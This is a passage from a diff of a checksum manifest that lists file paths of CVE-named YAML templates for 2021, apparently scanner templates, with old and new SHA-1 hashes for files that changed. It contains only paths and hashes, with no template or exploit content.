-http/cves/2021/CVE-2021-21801.yaml:940ff78b6102645d3a0f528bb0521b958e225031 -http/cves/2021/CVE-2021-21802.yaml:b858969ae45c1ae53fbbf227e63415f6b6b1a06e -http/cves/2021/CVE-2021-21803.yaml:2ef3cf3a7031fe7de22e837cec7fab43ddd43fca -http/cves/2021/CVE-2021-21805.yaml:eb1766b4e6c62d3ff6829821a5e944d1bb21babc +http/cves/2021/CVE-2021-21745.yaml:6222c9d2c8645ffaa32de1c39028a28bcd183082 +http/cves/2021/CVE-2021-21799.yaml:2f171a650be13baf18cfbd8a4c8b5e961827aa40 +http/cves/2021/CVE-2021-21800.yaml:1638be9a18b94b9eb05132143635b4668ff605c8 +http/cves/2021/CVE-2021-21801.yaml:c6c41e47254da5e398bb75f06d9f4c3400ca01a0 +http/cves/2021/CVE-2021-21802.yaml:c13ebeb4d41efc30f7e13bb5c0f1b4b1b469b79f +http/cves/2021/CVE-2021-21803.yaml:84f1528add8b6ffdf91ca8ef5227452f6a37cd77 +http/cves/2021/CVE-2021-21805.yaml:318c8cad7f9b3d3464160f435c5dda2a0b85867e http/cves/2021/CVE-2021-21816.yaml:520bc9b9b2480f3d3745af02a4a646d3cc95a1bb http/cves/2021/CVE-2021-21881.yaml:314c6a82741362db622de79002bdaaa699d77761 http/cves/2021/CVE-2021-21972.yaml:3cb1d3e5a750dee527ad05a5dde9606adf3534da http/cves/2021/CVE-2021-21973.yaml:853e9759bf3850a3c10bf2d32c0817837c5a9296 http/cves/2021/CVE-2021-21975.yaml:7f5af74dfddf9aad00a337757a5d13c48d2e32a5 -http/cves/2021/CVE-2021-21978.yaml:a4ca0080ca54e4fb2dd60df5a9b22016d5dc35c9 +http/cves/2021/CVE-2021-21978.yaml:8aabff2e16d6c1a606f7a8131f8c9c4156885355 http/cves/2021/CVE-2021-21985.yaml:de275a6d1f73b71650461305255ce4033fb0f6c3 -http/cves/2021/CVE-2021-22005.yaml:fe325a40c57f48bb4882a1fd996574deeb165879 -http/cves/2021/CVE-2021-22053.yaml:d8208a8a3043a154e1a4fe7f8509addc209f8875 -http/cves/2021/CVE-2021-22054.yaml:c1b2c935bc6b3a81302c81bfa50c0f6223aa1b1f -http/cves/2021/CVE-2021-22122.yaml:07ca11d8042ad99ed5aa7c541c736b1402fd7a5d -http/cves/2021/CVE-2021-22145.yaml:b4f6a6a818fbd74362c332552aabcf5bad37a688 -http/cves/2021/CVE-2021-22205.yaml:3bc9cd57d614ef6a973445c42055cf5697201c94 -http/cves/2021/CVE-2021-22214.yaml:7064fb2447f553a11ac940d7873755f0a31d2bcd +http/cves/2021/CVE-2021-22005.yaml:5b561670c55077e8de9fd19c0beb7e5fdb803f4a +http/cves/2021/CVE-2021-22053.yaml:fbe006fbc8394b6eacee6ad237dd73da0fb449c4 +http/cves/2021/CVE-2021-22054.yaml:c2de346923e112220a96eef52ac3ce54cea959e2 +http/cves/2021/CVE-2021-22122.yaml:afd75a3aea95f2f896b818a8951db13d1553d6dd +http/cves/2021/CVE-2021-22145.yaml:50c53aa0ad8179ca5c6a3ceca5ee45f75fc39edb +http/cves/2021/CVE-2021-22205.yaml:295d8f8b8991463618ae9b0649beee9bf60ce891 +http/cves/2021/CVE-2021-22214.yaml:9be0feb3e7d8d70731697b55e60e03991b023bee http/cves/2021/CVE-2021-22502.yaml:0222d90f5cb9381a29406ba64373c7a401ddaf0f -http/cves/2021/CVE-2021-22707.yaml:5f16e2f4524a176ad6521e6b3d80e5533447c44d -http/cves/2021/CVE-2021-22873.yaml:88b0b5dd1d60b31f5bb752d3931fd07e8bdf72c3 -http/cves/2021/CVE-2021-22911.yaml:6de8d0845adb4ef46c6447a4326a35cc946dd823 -http/cves/2021/CVE-2021-22986.yaml:31f5e400fc950bc34cf66eca3460919816e6f71c +http/cves/2021/CVE-2021-22707.yaml:285a3fb865a0f34788b7c98c5d0b0499fff4324b +http/cves/2021/CVE-2021-22873.yaml:37afc9d05370d6c092d337a0f241485d7780401e +http/cves/2021/CVE-2021-22911.yaml:8f4b010e1332d5eb900a0baa745f9364f8f56b31 +http/cves/2021/CVE-2021-22986.yaml:1076ec3050b272555fa680391c910a752b03e68a http/cves/2021/CVE-2021-23241.yaml:e1888868bf2770805a3f0cb3cae6820883bf9754 -http/cves/2021/CVE-2021-24145.yaml:e6e82aec5f5af7635fb64950a94cc6b5ede67c28 +http/cves/2021/CVE-2021-24145.yaml:354af1a704e593bb9efc889f47ce82d30177f92f http/cves/2021/CVE-2021-24146.yaml:30f30afaad0e48ad7394e8f3bc658e3c52ea375d http/cves/2021/CVE-2021-24150.yaml:bc46ae35079f405b539824e978457a5726b272ed http/cves/2021/CVE-2021-24155.yaml:fc725c5de1693bf4594d37b2b83d936127f2ff94 -http/cves/2021/CVE-2021-24165.yaml:cf99607da08b31da4b450f3c79ab66d2a78f4270 -http/cves/2021/CVE-2021-24169.yaml:6ab7986da54e496ed7901604980a6b62e95d0540 +http/cves/2021/CVE-2021-24165.yaml:27cba6c56a98cbdc748f6814224c197878411fc3 +http/cves/2021/CVE-2021-24169.yaml:c21c1c72a9513ec661cf3d6c7934301e52d2940d http/cves/2021/CVE-2021-24176.yaml:08064c398c90c5743dcd737492b44532ad8ae609 http/cves/2021/CVE-2021-24210.yaml:f3c92e19e3e4ecb701c23031ba681bc0bebbed93 -http/cves/2021/CVE-2021-24214.yaml:373a596e522804f9a9997fff30ef0f2acf94cc66 -http/cves/2021/CVE-2021-24215.yaml:37ab6917498b5938e472925d78a9ffc51df8ef4b +http/cves/2021/CVE-2021-24214.yaml:d6c9b3efb19f79dfa006ddc0776948c0b0456ba4 +http/cves/2021/CVE-2021-24215.yaml:a3f345d9b35b7e5ffb2bac0cf3d59a9e1a53b03a http/cves/2021/CVE-2021-24226.yaml:e3cce68f878058a5b883337446b715c4638ea5b2 -http/cves/2021/CVE-2021-24227.yaml:9a69a16794dbe8c405cb180f644fdfc4905907e1 -http/cves/2021/CVE-2021-24235.yaml:3cebd4f0ff47c09aa044f04f2a2a5556a270c627 +http/cves/2021/CVE-2021-24227.yaml:8fc4d2d5ed2eb9d6cfe65a19a96d237f7ffab7c5 +http/cves/2021/CVE-2021-24235.yaml:b292ae465be4b68e60b77f72a57ccc8563ebf31b http/cves/2021/CVE-2021-24236.yaml:b23f084964832d51ab3f4af593232ecdde5e6586 -http/cves/2021/CVE-2021-24237.yaml:3b933f6017ed933c7dd0e2bdb009e8a4380007fc -http/cves/2021/CVE-2021-24239.yaml:8675928c6b117809c4be9f080f0e3b90d3805e31 +http/cves/2021/CVE-2021-24237.yaml:0d3ee3780923885ddc6cffc545df05ff9b5004bd +http/cves/2021/CVE-2021-24239.yaml:a8d97d308ddfbcf213d28485265edcaca9429149 http/cves/2021/CVE-2021-24245.yaml:7bb1fc8f1f066614f4acc1287336318999c2b9ab http/cves/2021/CVE-2021-24274.yaml:fdc8b3c848faeec90768ba04b9afd444ada6ed29 -http/cves/2021/CVE-2021-24275.yaml:a1a605d2709c989d4b282a55c7b6420cb93f6f41 -http/cves/2021/CVE-2021-24276.yaml:14ab150dfbb0d9e69f444b87617e45e5d7c85fba -http/cves/2021/CVE-2021-24278.yaml:d0911c2e74a071f6ed35ec02836ae6f952343772 +http/cves/2021/CVE-2021-24275.yaml:699ee68f24f9120d66a588ba7d98403ae1bec79f +http/cves/2021/CVE-2021-24276.yaml:6d529d93b95d236e4d67e627f628dfc100a385d2 +http/cves/2021/CVE-2021-24278.yaml:0b2dc1146c6f6e6e271dc39b3f043f9c68eb69a4 http/cves/2021/CVE-2021-24284.yaml:8e0a2d867fefe5278478906204c54407d2c52981 -http/cves/2021/CVE-2021-24285.yaml:c25f3c43e4dacddb0dbec3562d7a32f46f09a59c -http/cves/2021/CVE-2021-24286.yaml:28e87a794c7aed34e30970461c7d6f4d5f9ca3cc -http/cves/2021/CVE-2021-24287.yaml:116274ad6f0c3249da6aed5bcf9662462615b117 -http/cves/2021/CVE-2021-24288.yaml:fb8bb41722f495b69d91278ed06ea186c2aa2fb4 -http/cves/2021/CVE-2021-24291.yaml:dad4f96eb0c16f1545431c9df93842305f26a1ae +http/cves/2021/CVE-2021-24285.yaml:92ccc610fac04483e22bf7475143c25140218d39 +http/cves/2021/CVE-2021-24286.yaml:4fc77bc8752808ae5219d482ff86de500e673399 +http/cves/2021/CVE-2021-24287.yaml:301c22e8fc62be986b55d8c632c971ada3634f04 +http/cves/2021/CVE-2021-24288.yaml:906f67ef2610bde07a1372beec43f666d94e7646 +http/cves/2021/CVE-2021-24291.yaml:989514beb32327a90f746f0b5a5cc7d37ab875ca http/cves/2021/CVE-2021-24298.yaml:ed0a99a0ae34549d1ba0cc1d1fc655a059ed6085 http/cves/2021/CVE-2021-24300.yaml:4e5f08f42588d8fc55a23ae949d761e9e9297f12 -http/cves/2021/CVE-2021-24316.yaml:e878005065bf4b6e222377ee880aef14d3342ebb -http/cves/2021/CVE-2021-24320.yaml:064d8840bd23e0bd74eee232616d5b3395229aef +http/cves/2021/CVE-2021-24316.yaml:4f664d0815cacf39455233fb049ba50fdab01c16 +http/cves/2021/CVE-2021-24320.yaml:bc1eb935a0f20a1d22bc2a6a0c120bfb9aca7f4b http/cves/2021/CVE-2021-24335.yaml:7e6548d5b8fd76c6cf9ebb4af47dd7f563999e1a -http/cves/2021/CVE-2021-24340.yaml:56f924a33ea2e02a7da8c72d8a98eae01d8286dd +http/cves/2021/CVE-2021-24340.yaml:45660d1227d8734c582cb7b1b79671940f80f45c http/cves/2021/CVE-2021-24342.yaml:45cf70e75e4e37166296cc7d2db4eee6b266a111 -http/cves/2021/CVE-2021-24347.yaml:a7b198fb418307f63ca9acf33e682de27d972f5f -http/cves/2021/CVE-2021-24351.yaml:5c8ef0e8c6bc5f6b7d9af51dcb39649fe73c975a -http/cves/2021/CVE-2021-24358.yaml:16d1d4314449c6b068c33c2130e3fcb0db7f165c +http/cves/2021/CVE-2021-24347.yaml:6c90d296d8416631ebaf7ece4b121eaf79c098e6 +http/cves/2021/CVE-2021-24351.yaml:10a1c630459cf99435e71b00505c5f64595ed030 +http/cves/2021/CVE-2021-24358.yaml:c7df8e26c19cfe2aa54d24d3fa8455d52b1698a1 http/cves/2021/CVE-2021-24364.yaml:462271144765c14ca8788b33496a643d7ff7dcf3 http/cves/2021/CVE-2021-24370.yaml:480c194476d40e71e0f58139dbac79cfcca559ba http/cves/2021/CVE-2021-24387.yaml:9d10f02a47e4a06f90f4f06a24f24e6177b962ec http/cves/2021/CVE-2021-24389.yaml:42ad59611f74158ae872570a997c48530f1b987f http/cves/2021/CVE-2021-24406.yaml:619168311788c421c9975c3b5285c06ade2c2dd7 http/cves/2021/CVE-2021-24407.yaml:1f40116c29a201347b75897f4ae36497de80c72a -http/cves/2021/CVE-2021-24409.yaml:2d79942f20f2565635b069191b9faf3ecc4e48ce -http/cves/2021/CVE-2021-24435.yaml:15387d29390d1ec6a1c5fb8f054dd823a10cef2f +http/cves/2021/CVE-2021-24409.yaml:d8e98773b4f78f847f8674f8fa150aa3d7534b1a +http/cves/2021/CVE-2021-24435.yaml:c2ec5e562bcc640a38deddebca4c7164b15f81bd http/cves/2021/CVE-2021-24436.yaml:602fa742a1830cb1f39707d935e978c4af32b0f6 -http/cves/2021/CVE-2021-24442.yaml:03047b68e4fab0c5aee20d5c8daeb94e7ec7045c +http/cves/2021/CVE-2021-24442.yaml:7e8e7ad39204adda8b6f027bd02c53354b19e5f5 http/cves/2021/CVE-2021-24452.yaml:83b001cad29a915b555b4ffc9e04f33a8e80637a -http/cves/2021/CVE-2021-24472.yaml:4dcca0eca6199a7b117013f82857bc7bd951533f +http/cves/2021/CVE-2021-24472.yaml:3c66ca8a367f6de92c875e08f5208b2c7680fddb http/cves/2021/CVE-2021-24488.yaml:f3a1efac3aee6f4c0a616e2c24eb9b422c05f159 -http/cves/2021/CVE-2021-24495.yaml:9776ce8d7642c38c752b5277411ae5ffd5d822f8 -http/cves/2021/CVE-2021-24498.yaml:e68e97cd91a0f778434094f485c1a13259df7149 +http/cves/2021/CVE-2021-24495.yaml:f4ecb1cb80b358b63faff083eccb92434ff2e6b9 +http/cves/2021/CVE-2021-24498.yaml:2dab1759f9177c9b511cc29caefbff8a3e30778f http/cves/2021/CVE-2021-24499.yaml:479ae56097144603aa0ac425b482797071c148a0 -http/cves/2021/CVE-2021-24510.yaml:ba66a091f2fa2c173e0cde1cbcb0c7e7e412f462 -http/cves/2021/CVE-2021-24554.yaml:3d14e85b29d926a1bfdd0408646468592755c2e4 -http/cves/2021/CVE-2021-24627.yaml:d08981841f2aadf45be7bfb2b624c740287bb846 -http/cves/2021/CVE-2021-24647.yaml:57e0c23fd8a53f4853ebd1bd8784bbd17ff174f1 +http/cves/2021/CVE-2021-24510.yaml:1e931f035d2345ecff4c534cfcef28fae8345c1d +http/cves/2021/CVE-2021-24554.yaml:e8341b35b6ad3ccd1b33edbffe1f61b464d6700d +http/cves/2021/CVE-2021-24627.yaml:57a1f4e2838721822caa3e97c15ad08a96ff52c0 +http/cves/2021/CVE-2021-24647.yaml:18c9d01f297fb0807334189d6e0c67dc881f6026 http/cves/2021/CVE-2021-24666.yaml:a25e0c97cdff1a1e807b28a99a00ef033722a6ac -http/cves/2021/CVE-2021-24731.yaml:3fb74c68ec27217782f13c9dcd2cbdcec90de59b -http/cves/2021/CVE-2021-24746.yaml:e817bdd5678f8a761303e95377fa9fd8c49bd351 -http/cves/2021/CVE-2021-24750.yaml:9a94ffcf36a259a6cd2de100ccdb877dd33b1619 +http/cves/2021/CVE-2021-24731.yaml:6d56d8b4ce11d8c5416a2dc8a8ec0557b507e515 +http/cves/2021/CVE-2021-24746.yaml:aaf375e2396c121de2a64543991c8850586bd8b4 +http/cves/2021/CVE-2021-24750.yaml:33880dabf05f52290bc3bdf6ef6a71dbccbe0005 http/cves/2021/CVE-2021-24762.yaml:33c2e8efc337a1f06768b1e6047d6a02c32e9e8a http/cves/2021/CVE-2021-24791.yaml:483a228643827bac8b87d83b78865d8f395bfd39 http/cves/2021/CVE-2021-24827.yaml:61c481595a7dabb304fd1c0cec9c7cd6a6a39684 -http/cves/2021/CVE-2021-24838.yaml:3e324388696bcd84d8cff8c5354abd28c3db3bcc -http/cves/2021/CVE-2021-24849.yaml:531bc837b67305d9b5488d191ab5bb1e88b9c8bd -http/cves/2021/CVE-2021-24862.yaml:18b88de1f2f004a26001bb93fc8072ec4f7a3372 -http/cves/2021/CVE-2021-24875.yaml:26b9421ad311a64c3696e1f27b6a87c2b2e64d8f -http/cves/2021/CVE-2021-24891.yaml:95ace65f00bc1b4f18f34b95b253c69f80192c35 +http/cves/2021/CVE-2021-24838.yaml:b0bc77f4126c393b78150ec6e3e6d3840c40a071 +http/cves/2021/CVE-2021-24849.yaml:bdfba047b022ac2a4e0168aae16ab6a5272c50de +http/cves/2021/CVE-2021-24862.yaml:78adc2493ed043de4466a990011b3bc4f7c88fe6 +http/cves/2021/CVE-2021-24875.yaml:78d31d54bfac674a34ecad0bbd7024aeb87c765c +http/cves/2021/CVE-2021-24891.yaml:664dffc5d4763e105b1438debac4ced927c4d6ae http/cves/2021/CVE-2021-24910.yaml:578aae9854f832a8e526a7a07c7d9b1557949de3 -http/cves/2021/CVE-2021-24915.yaml:8e2119bb3b35a4519c26947cf9e297ef976a134a -http/cves/2021/CVE-2021-24917.yaml:08f0ddeb207f275c090ca54b50434e696993b32b -http/cves/2021/CVE-2021-24926.yaml:ec83411f15a40fabfc7e893063d32fc7178a37dc +http/cves/2021/CVE-2021-24915.yaml:eb590415fa429797c7dc89516bc0261e38dc7f5b +http/cves/2021/CVE-2021-24917.yaml:c266a0fdaa11d4845b599de67c8a7943380fa539 +http/cves/2021/CVE-2021-24926.yaml:10bf105c8ef639ba7fc985d7954915b69c33c4b1 http/cves/2021/CVE-2021-24931.yaml:fee82426c5f1a5cbeb6c269ab91086e1026d14f6 -http/cves/2021/CVE-2021-24940.yaml:9b94c2a20503d658ae777df0cdf3168f25a936fb -http/cves/2021/CVE-2021-24943.yaml:798239f2034a244734927cb4c21f1511289eb724 -http/cves/2021/CVE-2021-24946.yaml:a1b408e926b8579f4ba65ae73a1ab85d6962bb2d -http/cves/2021/CVE-2021-24947.yaml:5d64893847435d3bf297bf280f24791f4cd58c51 +http/cves/2021/CVE-2021-24940.yaml:0481cbee1ce19ae7674a23128f0e1925164db6a7 +http/cves/2021/CVE-2021-24943.yaml:c8f138cd6d60951efb0adc150ed32d1daa789881 +http/cves/2021/CVE-2021-24946.yaml:5f09eec0c936dce40c7b346e73d3ab1e555b8026 +http/cves/2021/CVE-2021-24947.yaml:f91652cde78faaf0de5409ca19253ddd1ad4f11b http/cves/2021/CVE-2021-24956.yaml:3d8d0c0a4088c26ef4d5637c6e9f67b19539cb01 -http/cves/2021/CVE-2021-24970.yaml:43003e6dd3a06352c96df0c73482095e8e95a683 -http/cves/2021/CVE-2021-24979.yaml:b5cad9deea201ca00b277758a544a75b35d45db3 +http/cves/2021/CVE-2021-24970.yaml:fe2f26a13278d271e48a316d9826bf197e66d730 +http/cves/2021/CVE-2021-24979.yaml:7f132c8ef8c2fb055cdfd9265496a4ac0871f79f http/cves/2021/CVE-2021-24987.yaml:06ec87f0d9dad1a08870b903b897645a4114cca6 http/cves/2021/CVE-2021-24991.yaml:4bc4eec76c21b3f68454f49c72adff65d3a817b5 http/cves/2021/CVE-2021-24997.yaml:1824a3b9d5a403431c731e636e0365e882b2e145 -http/cves/2021/CVE-2021-25003.yaml:a8d3634ad0c75055bb3d751f846e3a586e54e7ad -http/cves/2021/CVE-2021-25008.yaml:08a6fdd6b7c3c743fc1b023df5905a53e90348eb -http/cves/2021/CVE-2021-25016.yaml:13eca21533bf781856bc7ecd416bdd8abf804653 +http/cves/2021/CVE-2021-25003.yaml:f85acfb13bf701684d4fe91b81e2217b30c9eb94 +http/cves/2021/CVE-2021-25008.yaml:e2bd2d41b569468489e3745dd421c1a15577402e +http/cves/2021/CVE-2021-25016.yaml:27da4e6df7ca94efe2b8b2cd4ddaa06bf44c8938 http/cves/2021/CVE-2021-25028.yaml:533752557ff220a1bd422d2fb856f1ffb91b9969 -http/cves/2021/CVE-2021-25033.yaml:418b528ea6c7886e28b79f4f7673c158e9216acb -http/cves/2021/CVE-2021-25052.yaml:76f2ab4b9468c2d95ef7165c8e45620ccd38e4fa +http/cves/2021/CVE-2021-25033.yaml:8768311c117a0653e7cc5c8a4cc75d0769cee3c8 +http/cves/2021/CVE-2021-25052.yaml:8dd5740bf3f98413a43c07b460940805e897ad52 http/cves/2021/CVE-2021-25055.yaml:f7703e52995b4903f92459e9ef95df26f9bed1a2 -http/cves/2021/CVE-2021-25063.yaml:821b39a53a40c8ffa4ba2180a1ef6aefa92306d5 -http/cves/2021/CVE-2021-25065.yaml:11f959dceee9ebf18badd3b3a811dea7709bb1b1 -http/cves/2021/CVE-2021-25067.yaml:ed26c9fc4b409093178bf53f71c0269b444a6ed1 +http/cves/2021/CVE-2021-25063.yaml:e0bfef38d39cfee9f885137ec3d3cb0a7565d712 +http/cves/2021/CVE-2021-25065.yaml:8ee7924a64132a0832e11a12581aae746b5da1c6 +http/cves/2021/CVE-2021-25067.yaml:51479ec179abace5e91c9513c221d45abb98ed25 http/cves/2021/CVE-2021-25074.yaml:5a380fe97e9ed2a623bb5d9a76a78a9b9581a041 -http/cves/2021/CVE-2021-25075.yaml:39e68482ba95ae484dbef4d943f3eeeef1d76c1e -http/cves/2021/CVE-2021-25078.yaml:6b6bce6eb2304b9669b02daf33b5beb1d08de327 -http/cves/2021/CVE-2021-25079.yaml:c37bcd8632bac20013d43f089a769bdff04eca2e -http/cves/2021/CVE-2021-25085.yaml:a7de237e23ca9d8f5ed0d68dc839956519456fa8 -http/cves/2021/CVE-2021-25099.yaml:c15223269d9bd03eadab6821d3b09267804d0ed4 +http/cves/2021/CVE-2021-25075.yaml:e47f941254f36267b1c9187f43bee0596e1d31a0 +http/cves/2021/CVE-2021-25078.yaml:d7e219fd39f415ccd30398b2bb8cea67897fa1f3 +http/cves/2021/CVE-2021-25079.yaml:18d97db163ecd42a7224f6e1e1a6a4ac9aeac16f +http/cves/2021/CVE-2021-25085.yaml:2a5c1befc2d27ea7d66485e2b0d10256b6359d91 +http/cves/2021/CVE-2021-25099.yaml:9c14323218b138b43e2196b0d9665aaef686f140 http/cves/2021/CVE-2021-25104.yaml:78f06eb1f70bad226faeeb2acd5b31bb5ee06fa3 -http/cves/2021/CVE-2021-25111.yaml:6b0f40ebc6836b0910f632f9e4a9610a6f506f3e +http/cves/2021/CVE-2021-25111.yaml:ba58695551c73cbccfd585cb8bb325f9558843b6 http/cves/2021/CVE-2021-25112.yaml:863f1f1178f01d7d278802acb2490d230f2c28b5 -http/cves/2021/CVE-2021-25114.yaml:5b5fc3cb6fb7099595c72d0ef22782c7da5cf94b +http/cves/2021/CVE-2021-25114.yaml:de2fc9698799328224086ad54e11e3bf5188bbd8 http/cves/2021/CVE-2021-25118.yaml:bb89b24586f268eeed7c70d7677aa51abb677f32 -http/cves/2021/CVE-2021-25120.yaml:ef1129f3d01121e72cc251f4907dd31121f483f3 -http/cves/2021/CVE-2021-25281.yaml:926d40b41dca38380afe266c4747a494831e1d82 -http/cves/2021/CVE-2021-25296.yaml:747b671ba0e06ff9f7a235ac299f30d4aa099a32 -http/cves/2021/CVE-2021-25297.yaml:52682c3fea52165dc90b59148a0698dce7ec8358 -http/cves/2021/CVE-2021-25298.yaml:0babaec0f4066df9e4caef4eb34b191becf207c8 -http/cves/2021/CVE-2021-25299.yaml:63f77b7b22f20671c58467d9ef2a3826eb2dba51 -http/cves/2021/CVE-2021-25646.yaml:2218d09cd6aee5362f65fb76eee19ff15b8a7b6e -http/cves/2021/CVE-2021-25864.yaml:1ece5f67939fdf5bd24bb6b8b80a4d675100bbf1 -http/cves/2021/CVE-2021-25899.yaml:f84c990490b6e778e06b4abe4673f22c8c954369 -http/cves/2021/CVE-2021-26084.yaml:f13d57a5d654aaabcb6d3548e4ab7e6f4d9c5f4a -http/cves/2021/CVE-2021-26085.yaml:131be1d64bcb55e9a0059917d137c2b2ef5764a8 -http/cves/2021/CVE-2021-26086.yaml:d96d98b05336c9039bdedb473ff20e12255102fa -http/cves/2021/CVE-2021-26247.yaml:daa7279c49fb11ec4e6fcf38895ee3e23cef5d43 +http/cves/2021/CVE-2021-25120.yaml:17afacb43d764c45b4c11ef9151650d2cad6cfe2 +http/cves/2021/CVE-2021-25281.yaml:79d1459249cba40c4206e09d5ef25896ec77d5e5 +http/cves/2021/CVE-2021-25296.yaml:1ea2da93367acd6bef79a47edee35099bb087c1b +http/cves/2021/CVE-2021-25297.yaml:33a348dfb79f066846084ead1356f6f11e048cd4 +http/cves/2021/CVE-2021-25298.yaml:3f131671eb4b758e70cc80c0ca71539fee296f0b +http/cves/2021/CVE-2021-25299.yaml:272a24bd9027674933e7ab964c9d120c8927417b +http/cves/2021/CVE-2021-25646.yaml:38bddfd4767c88b7a9adef79e7dd77f2b6b497ff +http/cves/2021/CVE-2021-25864.yaml:9daaf664447e04b31a2b08aea568666ed5b252c1 +http/cves/2021/CVE-2021-25899.yaml:847672538dfa776dd187401f816389805b41b0f4 +http/cves/2021/CVE-2021-26084.yaml:dc74db623993b3a425c67b349398428b21f4e59d +http/cves/2021/CVE-2021-26085.yaml:12540e7492ab6145ffdda97b28253d0a3a1f3953 +http/cves/2021/CVE-2021-26086.yaml:b35438578547ec4be571d2dbe1f853170d01713f +http/cves/2021/CVE-2021-26247.yaml:380aba2d0b92a8def54f9928094a3ca0882d4e43 http/cves/2021/CVE-2021-26292.yaml:29180065c333be64a12dc3343a26bf290917d6c0 -http/cves/2021/CVE-2021-26294.yaml:15b5b6c816a5b0c96e4862d79c168a57e4a41b58 -http/cves/2021/CVE-2021-26295.yaml:760a664616356d218f9d8b23a5e26619132182a9 +http/cves/2021/CVE-2021-26294.yaml:31dc342ac953702eae9e11db5a4b67ccb1167d1c +http/cves/2021/CVE-2021-26295.yaml:617901b1d282ad4b7baf4cf033bfc80b78bcc89f http/cves/2021/CVE-2021-26475.yaml:287c333e6e6c35e539e84260d37699f19044b24b -http/cves/2021/CVE-2021-26598.yaml:564c72e7ded58474a970f8bb81499d37bec2eb6f -http/cves/2021/CVE-2021-26702.yaml:38b4c6ea7314d91de56621916deab69db896521f -http/cves/2021/CVE-2021-26710.yaml:62c7e47d0b5631d581a26268dc2fac090da415df -http/cves/2021/CVE-2021-26723.yaml:485872f7cfd865bf4f7974965ab17efaf6fdcf78 -http/cves/2021/CVE-2021-26812.yaml:59f135266598da23e8ccbc78b6800509764ef731 -http/cves/2021/CVE-2021-26855.yaml:eebc2b4f2b4bdce6eb1f3939ba31f790416289b4 -http/cves/2021/CVE-2021-27124.yaml:1629ecb945e3672b3d085110841767983165201f +http/cves/2021/CVE-2021-26598.yaml:c8a1911cf29d1503f0f2c7ed84b03eb5554e4cd5 +http/cves/2021/CVE-2021-26702.yaml:eb202f4e53a83dd20ad98f8cbd4158d66c60fed5 +http/cves/2021/CVE-2021-26710.yaml:ef7eb66ac883942d63f1343399937aa1dca8f788 +http/cves/2021/CVE-2021-26723.yaml:00ec7edcbdeaccdac3537404c8d6c7c3f5c01ca4 +http/cves/2021/CVE-2021-26812.yaml:3250f33a0d0ac1fc31b614df064b199abfb9aa84 +http/cves/2021/CVE-2021-26855.yaml:c42466d47d13e63fe225cbfe03e4ea5643fee6d9 +http/cves/2021/CVE-2021-27124.yaml:c5733fec98010b27de00dee5c3b7a7dbc1c5ae3d http/cves/2021/CVE-2021-27132.yaml:fcfd3632c51f9fc6add57cb17f22c786e429bc9f -http/cves/2021/CVE-2021-27309.yaml:a3a9b515c775670ff42193b413141bdb9a093baf +http/cves/2021/CVE-2021-27309.yaml:c0a0e164a992636c4d75f5c5a48093382a4a0861 http/cves/2021/CVE-2021-27310.yaml:6c130175ed546ffc7a70969fe956b16deee4f64d http/cves/2021/CVE-2021-27314.yaml:5a5d404050557c21d88703fe905484af36df4d1c -http/cves/2021/CVE-2021-27315.yaml:74654fa6664463c75851f08e5fd40fa498c1e16e +http/cves/2021/CVE-2021-27315.yaml:a35e2b21d64664b1dc1b051b9aebe2c0d8bbea9a http/cves/2021/CVE-2021-27316.yaml:75fe1ce09716aeebd01d4e93523b46c13ac35002 -http/cves/2021/CVE-2021-27319.yaml:4ac703375c9f54452dae10e45521a9e9e275d3bf -http/cves/2021/CVE-2021-27320.yaml:8892536ec8bde5ba1d2a36bafdca53d74a970dc6 -http/cves/2021/CVE-2021-27330.yaml:7c15e8c428cf23f33e9417b848aa1548bb097aba -http/cves/2021/CVE-2021-27358.yaml:8a9b766705b30e318f54311f1ac6ce99298e6c1d -http/cves/2021/CVE-2021-27519.yaml:1e478365ef619cb1325a309573643277445efaec -http/cves/2021/CVE-2021-27520.yaml:460e5969818aa1cf1a07bd3688404dca0ae3ebf0 -http/cves/2021/CVE-2021-27561.yaml:48b8e25de3c4b67ab3c08074a6392f8b79b56d21 -http/cves/2021/CVE-2021-27651.yaml:fb07d45f4dea3a695c3ba1cf1b17282568f3e11d -http/cves/2021/CVE-2021-27670.yaml:ccc4db0cad2f1e302de60259feaf399494056e85 +http/cves/2021/CVE-2021-27319.yaml:b785025398590a56aed4ddf2ded77eb580bf4c39 +http/cves/2021/CVE-2021-27320.yaml:4316c2de8def2bfa92ed880cfcee4a994e548b67 +http/cves/2021/CVE-2021-27330.yaml:b3d6336e6b5b9df123cebe0ea046817c7e2b25cc +http/cves/2021/CVE-2021-27358.yaml:94fdaf01a21c8691d6b0cada2300997502f97da4 +http/cves/2021/CVE-2021-27519.yaml:9987f825d5eef281ad03167be9471e2ff5bd9d33 +http/cves/2021/CVE-2021-27520.yaml:71740db07b842e556ff0e3502301f823a213012d +http/cves/2021/CVE-2021-27561.yaml:4466d02ccd5225c530894a23f7271a4e52927715 +http/cves/2021/CVE-2021-27651.yaml:d4495c5c75916c88ebcfc6963aedcc1ac85c0c68 +http/cves/2021/CVE-2021-27670.yaml:b6418fe5edaaaecb5a4ec9a22c7eed0ccd501832 http/cves/2021/CVE-2021-27748.yaml:1dc51db3b3d3be24e2be6387448b7a662531edb5 -http/cves/2021/CVE-2021-27850.yaml:6d39edaca13ab611f58c51ec72e93ef55b05dfa5 -http/cves/2021/CVE-2021-27905.yaml:d83ca42e2d53248b98aff534b7ba88f52858d1e8 -http/cves/2021/CVE-2021-27909.yaml:788c3fd40aa42d55bb56f89c662a03cb92649b7f -http/cves/2021/CVE-2021-27931.yaml:8dacc9bb81db5a5aeb0dffde8a034619108d38c8 +http/cves/2021/CVE-2021-27850.yaml:64ecfed4708d7c2dc35acd4db916dbc2eb32ad74 +http/cves/2021/CVE-2021-27905.yaml:e55b787c321dac5c1fe1733431f805aa1b9a0c45 +http/cves/2021/CVE-2021-27909.yaml:b06dd842f67a5a6312ab0cf479ab4839b1005187 +http/cves/2021/CVE-2021-27931.yaml:52bce3b2966d95aaf19fbfc72760e749b05c862c http/cves/2021/CVE-2021-28073.yaml:b69885510093cff31b667b35c1004583ec9fbbf2 http/cves/2021/CVE-2021-28149.yaml:0a69b168f8c598056a57c29b2c4225737cb83bf0 -http/cves/2021/CVE-2021-28150.yaml:5c44f0523781a0f4b2d9fb25b5c1e9060126b8df +http/cves/2021/CVE-2021-28150.yaml:a0787ef21b7d8d7d5f984f378d7bd37f54bdaeaa http/cves/2021/CVE-2021-28151.yaml:e126ac73a0c4ae22fe04e5a1374c2fc480bc1367 -http/cves/2021/CVE-2021-28164.yaml:c495e9844b37c21638f8ce764c2f65fd67ffd47d -http/cves/2021/CVE-2021-28169.yaml:2a2b83e42d9a0d4016f953c9a03cf66ca77395fd 